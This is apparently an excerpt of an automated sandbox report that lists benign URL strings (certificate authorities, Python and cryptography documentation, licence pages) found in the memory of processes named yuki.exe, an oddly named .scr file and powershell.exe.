00000000.00000003.1670986185.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671674830.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671986473.0000021E0C70C000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671610008.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671538445.0000021E0C70C000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671087144.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: yuki.exe, 00000001.00000003.1756784306.00000253A70D4000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1757370348.00000253A70E8000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1758743899.00000253A70D4000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1757734545.00000253A70D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: yuki.exe, 00000001.00000003.1758691182.00000253A71C3000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1756576927.00000253A71C3000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1756576927.00000253A7184000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1759088370.00000253A71E1000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2162550216.000001BE935F4000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2163513573.000001BE93283000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2162550216.000001BE9365C000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2164935398.000001BE9365C000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2166711879.000001BE93283000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2163284427.000001BE9365C000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2165599501.000001BE93283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577916/
Source: powershell.exe, 00000015.00000002.2423974013.000001B66FBC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
Source: powershell.exe, 00000015.00000002.2423974013.000001B66FBC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
Source: yuki.exe, 00000000.00000003.1671674830.0000021E0C70C000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671441009.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1739016847.0000021E0C700000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1740353628.0000021E0C701000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671911249.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671538445.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1672057001.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1740087340.0000021E0C701000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670570244.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671171954.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671750981.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670906171.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670737098.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671986473.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671830181.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670986185.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671674830.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671986473.0000021E0C70C000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671610008.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671538445.0000021E0C70C000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671087144.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: yuki.exe, 00000000.00000003.1740087340.0000021E0C701000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4
Source: yuki.exe, 00000000.00000003.1671441009.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1739016847.0000021E0C700000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1740353628.0000021E0C701000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671911249.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671538445.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1672057001.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1740087340.0000021E0C701000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670570244.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671171954.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671750981.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670906171.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670737098.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671986473.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671830181.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670986185.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671674830.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671610008.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671087144.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1672057001.0000021E0C70C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: yuki.exe, 00000000.00000003.1671441009.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1739016847.0000021E0C700000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1740353628.0000021E0C701000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671911249.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671538445.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1672057001.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1740087340.0000021E0C701000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670570244.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671171954.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671750981.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670906171.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670737098.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671986473.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671830181.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670986185.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671674830.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671610008.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671087144.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: yuki.exe, 00000000.00000003.1671087144.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: yuki.exe, 00000000.00000003.1671441009.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1739016847.0000021E0C700000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1740353628.0000021E0C701000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671911249.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671538445.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1672057001.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1740087340.0000021E0C701000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670570244.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671171954.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671750981.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670906171.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670737098.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671986473.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671830181.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670986185.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671674830.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671610008.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671087144.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1672057001.0000021E0C70C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: ? .scr, 00000012.00000003.2166355933.000001BE93291000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2165115726.000001BE935A4000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2165599501.000001BE93283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/library/itertools.html#recipes
Source: yuki.exe, 00000001.00000003.1759115375.00000253A6D3B000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2167827116.000001BE930F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://foo/bar.tar.gz
Source: yuki.exe, 00000001.00000003.1759115375.00000253A6D3B000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2167827116.000001BE930F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://foo/bar.tgz
Source: powershell.exe, 00000007.00000002.1964129202.0000023910070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2411059467.000001B66759A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: yuki.exe, 00000000.00000003.1671441009.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1739016847.0000021E0C700000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1740353628.0000021E0C701000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671911249.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671538445.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1672057001.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1740087340.0000021E0C701000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670570244.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671171954.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671750981.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670906171.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670737098.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671986473.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671830181.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670986185.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671674830.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671610008.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671087144.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1672057001.0000021E0C70C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: yuki.exe, 00000000.00000003.1671674830.0000021E0C70C000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671441009.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1739016847.0000021E0C700000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1740353628.0000021E0C701000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671911249.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671538445.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1672057001.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1740087340.0000021E0C701000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670570244.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671171954.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671750981.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670906171.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670737098.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671986473.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671830181.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670986185.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671674830.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671986473.0000021E0C70C000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671610008.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671538445.0000021E0C70C000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671087144.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
Source: yuki.exe, 00000000.00000003.1671674830.0000021E0C70C000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671441009.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1739016847.0000021E0C700000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1740353628.0000021E0C701000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671911249.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671538445.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1672057001.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1740087340.0000021E0C701000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670570244.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671171954.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671750981.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670906171.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670737098.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671986473.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671830181.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670986185.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671674830.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671986473.0000021E0C70C000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671610008.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671538445.0000021E0C70C000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671087144.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
Source: yuki.exe, 00000000.00000003.1671441009.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1739016847.0000021E0C700000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1740353628.0000021E0C701000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671911249.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671538445.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1672057001.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1740087340.0000021E0C701000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670570244.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671171954.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671750981.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670906171.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670737098.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671986473.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671830181.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670986185.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671674830.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671610008.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671087144.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
Source: ? .scr, 00000012.00000003.2158712348.000001BE9357A000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2158712348.000001BE93563000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2159805928.000001BE93567000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c
Source: powershell.exe, 00000015.00000002.2359032946.000001B657752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000007.00000002.1948692309.0000023900228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2359032946.000001B657752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000007.00000002.1948692309.0000023900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2359032946.000001B657531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.1948692309.0000023900228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2359032946.000001B657752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: yuki.exe, 00000000.00000003.1739107016.0000021E0C700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/
Source: yuki.exe, 00000000.00000003.1739107016.0000021E0C70E000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1739107016.0000021E0C700000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000011.00000003.2142657431.000001DA7FA9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000015.00000002.2359032946.000001B657752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: yuki.exe, 00000001.00000003.1757652839.00000253A6D22000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1757277642.00000253A6D1C000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000001.00000003.1756037846.00000253A6D21000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2158712348.000001BE9357A000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2158712348.000001BE93563000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2159805928.000001BE93567000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: yuki.exe, 00000000.00000003.1671441009.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1739016847.0000021E0C700000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1740353628.0000021E0C701000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671911249.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671538445.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1672057001.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1740087340.0000021E0C701000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670570244.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671171954.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671750981.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670906171.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670737098.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671986473.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671830181.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1670986185.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671674830.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671610008.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1671087144.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmp, yuki.exe, 00000000.00000003.1672057001.0000021E0C70C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000015.00000002.2421506568.000001B66F974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000007.00000002.1948692309.0000023900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2359032946.000001B657531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000015.00000002.2411059467.000001B66759A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000015.00000002.2411059467.000001B66759A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000015.00000002.2411059467.000001B66759A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: yuki.exe, 00000000.00000003.1672894619.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io
Source: yuki.exe, 00000000.00000003.1672894619.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/
Source: yuki.exe, 00000000.00000003.1672894619.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/changelog/
Source: yuki.exe, 00000000.00000003.1672894619.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/installation/
Source: yuki.exe, 00000000.00000003.1672894619.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/security/
Source: ? .scr, 00000012.00000003.2162631055.000001BE93237000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2161702323.000001BE93237000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2160473168.000001BE93237000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2163513573.000001BE93237000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2159887065.000001BE93237000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2160997219.000001BE93237000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2158766660.000001BE93237000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: ? .scr, 00000012.00000003.2155400252.000001BE92D0A000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2155332836.000001BE92CD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/howto/mro.html.
Source: ? .scr, 00000011.00000003.2142657431.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.metadata.html
Source: ? .scr, 00000011.00000003.2142657431.000001DA7FA8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/reference/import.html#finders-and-loaders
Source: ? .scr, 00000012.00000003.2165826210.000001BE931FB000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2167827116.000001BE931FB000.00000004.00000020.00020000.00000000.sdmp, ? .scr, 00000012.00000003.2162631055.000001BE931FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca
Source: powershell.exe, 00000015.00000002.2359032946.000001B657752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: yuki.exe, 00000000.00000003.1672894619.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography
Source: yuki.exe, 00000000.00000003.1672894619.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/
Source: yuki.exe, 00000000.00000003.1672894619.0000021E0C702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/actions?query=workflow%3ACI
